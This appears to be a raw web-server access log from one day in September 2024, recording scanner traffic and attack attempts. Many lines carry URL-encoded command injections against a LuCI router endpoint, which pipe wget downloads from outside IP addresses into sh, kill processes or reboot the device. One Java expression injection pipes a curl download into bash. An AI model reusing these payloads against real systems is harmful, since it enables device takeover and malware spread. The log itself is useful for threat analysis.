185.224.128.52 - - [30/Sep/2024:00:21:23 +0200] "-" 400 1930
185.224.128.52 - - [30/Sep/2024:00:22:23 +0200] "GET /web/function/init.js HTTP/1.1" 404 746
87.120.166.244 - - [30/Sep/2024:00:22:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
179.43.133.162 - - [30/Sep/2024:00:58:21 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804
164.92.159.97 - - [30/Sep/2024:01:13:27 +0200] "CONNECT dns.google:443 HTTP/1.1" 400 804
64.226.79.183 - - [30/Sep/2024:01:50:59 +0200] "GET / HTTP/1.1" 200 1895
91.92.247.105 - - [30/Sep/2024:01:52:20 +0200] "HEAD / HTTP/1.0" 200 -
91.92.247.105 - - [30/Sep/2024:01:52:20 +0200] "GET / HTTP/1.1" 200 1895
154.213.184.18 - - [30/Sep/2024:01:57:53 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804
185.224.128.83 - - [30/Sep/2024:02:05:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756
185.224.128.83 - - [30/Sep/2024:02:05:16 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756
141.98.11.79 - - [30/Sep/2024:02:09:02 +0200] "GET / HTTP/1.1" 200 1895
154.213.184.15 - - [30/Sep/2024:02:09:19 +0200] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 816
154.213.187.5 - - [30/Sep/2024:02:09:23 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
94.156.67.70 - - [30/Sep/2024:02:09:51 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804
154.213.184.25 - - [30/Sep/2024:02:54:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
79.137.198.113 - - [30/Sep/2024:03:06:27 +0200] "GET / HTTP/1.1" 200 1895
176.123.1.244 - - [30/Sep/2024:03:46:49 +0200] "GET / HTTP/1.1" 200 1895
154.213.184.25 - - [30/Sep/2024:03:50:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
154.213.187.52 - - [30/Sep/2024:04:00:34 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
87.120.166.244 - - [30/Sep/2024:04:17:11 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.224.128.52 - - [30/Sep/2024:04:17:27 +0200] "-" 400 1930
185.224.128.52 - - [30/Sep/2024:04:18:19 +0200] "GET /web/function/init.js HTTP/1.1" 404 746
185.224.128.67 - - [30/Sep/2024:04:24:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60busybox+reboot%3B%60) HTTP/1.1" 404 756
64.62.197.75 - - [30/Sep/2024:04:32:50 +0200] "-" 400 1930
66.132.153.57 - - [30/Sep/2024:04:38:19 +0200] "GET / HTTP/1.1" 200 1895
66.132.153.57 - - [30/Sep/2024:04:38:22 +0200] "GET / HTTP/1.1" 200 1895
66.132.153.57 - - [30/Sep/2024:04:38:22 +0200] "GET /favicon.ico HTTP/1.1" 404 729
103.186.101.138 - - [30/Sep/2024:04:47:47 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804
147.182.139.95 - - [30/Sep/2024:04:53:38 +0200] "-" 400 1930
147.182.139.95 - - [30/Sep/2024:04:53:38 +0200] "-" 400 1930
147.182.139.95 - - [30/Sep/2024:04:53:38 +0200] "GET / HTTP/1.1" 200 1895
147.182.139.95 - - [30/Sep/2024:04:53:38 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
45.148.10.242 - - [30/Sep/2024:05:12:54 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
154.213.187.186 - - [30/Sep/2024:05:14:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
154.213.184.18 - - [30/Sep/2024:05:45:12 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804
185.224.128.59 - - [30/Sep/2024:05:56:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756
185.224.128.59 - - [30/Sep/2024:05:56:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756
185.224.128.83 - - [30/Sep/2024:06:02:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 404 756
185.224.128.83 - - [30/Sep/2024:06:02:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756
154.213.187.102 - - [30/Sep/2024:06:15:53 +0200] "GET / HTTP/1.1" 200 1895
165.227.93.19 - - [30/Sep/2024:06:16:23 +0200] "-" 400 1930
198.235.24.156 - - [30/Sep/2024:06:43:55 +0200] "GET / HTTP/1.1" 200 1895
95.214.55.43 - - [30/Sep/2024:06:48:44 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.176%2Ft%7Csh%3B%60) HTTP/1.1" 404 756
45.84.89.2 - - [30/Sep/2024:06:50:50 +0200] "GET / HTTP/1.1" 200 1895
205.210.31.239 - - [30/Sep/2024:07:28:42 +0200] "GET / HTTP/1.0" 200 1895
184.105.247.238 - - [30/Sep/2024:07:37:07 +0200] "GET / HTTP/1.1" 200 1895
184.105.247.252 - - [30/Sep/2024:07:37:40 +0200] "GET /favicon.ico HTTP/1.1" 404 729
184.105.247.247 - - [30/Sep/2024:07:38:11 +0200] "GET /?format=json HTTP/1.1" 200 1895
184.105.247.247 - - [30/Sep/2024:07:38:37 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804
184.105.247.238 - - [30/Sep/2024:07:39:04 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740
154.213.184.25 - - [30/Sep/2024:07:53:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
154.213.187.52 - - [30/Sep/2024:07:56:49 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
147.45.112.158 - - [30/Sep/2024:08:04:46 +0200] "-" 400 1930
185.224.128.52 - - [30/Sep/2024:08:09:01 +0200] "-" 400 1930
185.224.128.52 - - [30/Sep/2024:08:10:17 +0200] "GET /web/function/init.js HTTP/1.1" 404 746
185.224.128.67 - - [30/Sep/2024:08:28:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60busybox+reboot%3B%60) HTTP/1.1" 404 756
87.120.166.244 - - [30/Sep/2024:08:31:57 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
52.171.39.178 - - [30/Sep/2024:08:52:19 +0200] "HEAD /invoker/EJBInvokerServlet HTTP/1.1" 404 -
52.171.39.178 - - [30/Sep/2024:08:52:22 +0200] "HEAD /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo HTTP/1.1" 404 -
52.171.39.178 - - [30/Sep/2024:08:52:25 +0200] "HEAD /invoker/JMXInvokerServlet HTTP/1.1" 404 -
52.171.39.178 - - [30/Sep/2024:08:52:29 +0200] "HEAD /web-console/ServerInfo.jsp HTTP/1.1" 404 -
154.213.187.5 - - [30/Sep/2024:09:03:23 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
89.106.110.178 - - [30/Sep/2024:09:04:09 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771
165.227.93.19 - - [30/Sep/2024:09:09:50 +0200] "-" 400 1930
154.213.184.18 - - [30/Sep/2024:09:41:37 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804
78.108.177.52 - - [30/Sep/2024:10:25:48 +0200] "GET / HTTP/1.0" 200 1895
154.213.184.25 - - [30/Sep/2024:11:03:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.224.128.52 - - [30/Sep/2024:11:08:13 +0200] "-" 400 1930
185.224.128.52 - - [30/Sep/2024:11:08:51 +0200] "GET /web/function/init.js HTTP/1.1" 404 746
95.214.55.43 - - [30/Sep/2024:11:11:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.176%2Ft%7Csh%3B%60) HTTP/1.1" 404 756
18.223.33.131 - - [30/Sep/2024:11:18:11 +0200] "GET / HTTP/1.1" 200 1895
103.186.101.138 - - [30/Sep/2024:11:22:34 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804
185.224.128.83 - - [30/Sep/2024:11:29:11 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
185.224.128.59 - - [30/Sep/2024:11:31:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756
154.213.187.241 - - [30/Sep/2024:11:43:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.224.128.67 - - [30/Sep/2024:11:46:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60busybox+reboot%3B%60) HTTP/1.1" 404 756
154.213.184.25 - - [30/Sep/2024:12:51:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
87.120.166.244 - - [30/Sep/2024:13:31:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
27.109.28.170 - - [30/Sep/2024:13:51:17 +0200] "GET / HTTP/1.0" 200 1895
154.213.184.18 - - [30/Sep/2024:13:54:14 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804
45.148.10.242 - - [30/Sep/2024:14:06:50 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
185.224.128.83 - - [30/Sep/2024:14:24:46 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
84.0.92.165 - - [30/Sep/2024:14:25:52 +0200] "GET / HTTP/1.0" 200 1895
154.213.184.25 - - [30/Sep/2024:14:33:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
179.43.133.162 - - [30/Sep/2024:14:37:56 +0200] "CONNECT cloudflare.com:443 HTTP/1.1" 400 804
185.224.128.52 - - [30/Sep/2024:15:02:24 +0200] "-" 400 1930
185.224.128.52 - - [30/Sep/2024:15:03:17 +0200] "GET /web/function/init.js HTTP/1.1" 404 746
183.134.104.170 - - [30/Sep/2024:15:33:24 +0200] "GET / HTTP/1.0" 200 1895
115.238.44.234 - - [30/Sep/2024:15:37:39 +0200] "GET / HTTP/1.0" 200 1895
94.156.67.70 - - [30/Sep/2024:16:09:57 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
103.186.101.138 - - [30/Sep/2024:16:13:22 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804
185.224.128.67 - - [30/Sep/2024:16:13:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60busybox+reboot%3B%60) HTTP/1.1" 404 756
95.214.55.43 - - [30/Sep/2024:16:17:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.176%2Ft%7Csh%3B%60) HTTP/1.1" 404 756
172.168.41.227 - - [30/Sep/2024:16:40:23 +0200] "GET /actuator/health HTTP/1.1" 404 737
154.213.184.15 - - [30/Sep/2024:16:57:06 +0200] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 816
185.191.126.213 - - [30/Sep/2024:17:05:16 +0200] "GET / HTTP/1.1" 200 1895
154.213.187.5 - - [30/Sep/2024:17:16:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
87.120.166.244 - - [30/Sep/2024:17:23:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.224.128.59 - - [30/Sep/2024:17:29:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1" 404 756
165.154.11.121 - - [30/Sep/2024:17:33:35 +0200] "-" 400 1930
165.154.11.121 - - [30/Sep/2024:17:33:45 +0200] "GET / HTTP/1.1" 200 1895
165.154.11.121 - - [30/Sep/2024:17:34:04 +0200] "GET /favicon.ico HTTP/1.1" 404 729
165.154.11.121 - - [30/Sep/2024:17:34:04 +0200] "GET /robots.txt HTTP/1.1" 404 728
165.154.11.121 - - [30/Sep/2024:17:34:04 +0200] "GET /sitemap.xml HTTP/1.1" 404 729
165.154.11.121 - - [30/Sep/2024:17:34:05 +0200] "GET /config.json HTTP/1.1" 404 729
165.227.93.19 - - [30/Sep/2024:17:43:28 +0200] "-" 400 1930
185.191.126.213 - - [30/Sep/2024:17:48:45 +0200] "GET / HTTP/1.1" 200 1895
154.213.184.18 - - [30/Sep/2024:17:50:05 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804
185.224.128.83 - - [30/Sep/2024:18:05:38 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
154.213.187.102 - - [30/Sep/2024:18:21:28 +0200] "GET / HTTP/1.1" 200 1895
154.213.184.25 - - [30/Sep/2024:18:45:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.224.128.52 - - [30/Sep/2024:18:51:32 +0200] "-" 400 1930
185.224.128.52 - - [30/Sep/2024:18:52:16 +0200] "GET /web/function/init.js HTTP/1.1" 404 746
185.224.128.83 - - [30/Sep/2024:19:23:48 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
154.213.187.241 - - [30/Sep/2024:19:48:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.224.128.67 - - [30/Sep/2024:20:06:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60busybox+reboot%3B%60) HTTP/1.1" 404 756
154.213.187.5 - - [30/Sep/2024:20:07:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
154.213.184.25 - - [30/Sep/2024:20:14:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
45.88.97.46 - - [30/Sep/2024:20:18:22 +0200] "CONNECT karlshochschule.de:443 HTTP/1.1" 400 804
205.210.31.66 - - [30/Sep/2024:20:26:51 +0200] "GET / HTTP/1.1" 200 1895
139.59.37.187 - - [30/Sep/2024:20:28:59 +0200] "GET /aaa9 HTTP/1.1" 404 722
139.59.37.187 - - [30/Sep/2024:20:28:59 +0200] "GET /aab8 HTTP/1.1" 404 722
139.59.37.187 - - [30/Sep/2024:20:29:00 +0200] "GET / HTTP/1.1" 200 1895
87.120.166.244 - - [30/Sep/2024:20:30:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
71.6.232.27 - - [30/Sep/2024:20:36:34 +0200] "GET / HTTP/1.1" 200 1895
95.214.27.169 - - [30/Sep/2024:20:39:38 +0200] "GET / HTTP/1.1" 200 1895
95.214.27.169 - - [30/Sep/2024:20:39:38 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804
95.214.27.169 - - [30/Sep/2024:20:39:38 +0200] "GET / HTTP/1.1" 200 1895
95.214.27.169 - - [30/Sep/2024:20:39:38 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804
95.214.55.43 - - [30/Sep/2024:21:24:46 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.176%2Ft%7Csh%3B%60) HTTP/1.1" 404 756
185.224.128.83 - - [30/Sep/2024:21:43:54 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
154.213.184.18 - - [30/Sep/2024:21:44:09 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804
172.104.243.228 - - [30/Sep/2024:21:54:35 +0200] "GET /%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27,%27-c%27,%27%28curl%20-s%20194.120.230.54/bin.sh%7C%7Cwget%20-q%20-O-%20194.120.230.54/bin.sh%29%7Cbash%27%29.start%28%29%22%29%7D/ HTTP/1.1" 404 1015
172.104.11.4 - - [30/Sep/2024:21:54:49 +0200] "-" 400 1930
205.210.31.217 - - [30/Sep/2024:21:55:08 +0200] "GET / HTTP/1.1" 200 1895
172.212.58.126 - - [30/Sep/2024:21:55:13 +0200] "GET / HTTP/1.1" 200 1895
172.104.210.105 - - [30/Sep/2024:22:01:26 +0200] "GET / HTTP/1.1" 200 1895
45.33.80.243 - - [30/Sep/2024:22:01:44 +0200] "GET / HTTP/1.1" 200 1895
154.213.184.25 - - [30/Sep/2024:22:15:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
185.224.128.52 - - [30/Sep/2024:22:37:10 +0200] "-" 400 1930
185.224.128.52 - - [30/Sep/2024:22:37:58 +0200] "GET /web/function/init.js HTTP/1.1" 404 746
185.224.128.59 - - [30/Sep/2024:22:49:05 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
103.186.101.138 - - [30/Sep/2024:23:01:40 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804
185.224.128.67 - - [30/Sep/2024:23:08:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 756
141.98.11.129 - - [30/Sep/2024:23:19:18 +0200] "GET / HTTP/1.1" 200 1895
45.148.10.242 - - [30/Sep/2024:23:24:18 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
154.213.187.241 - - [30/Sep/2024:23:25:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804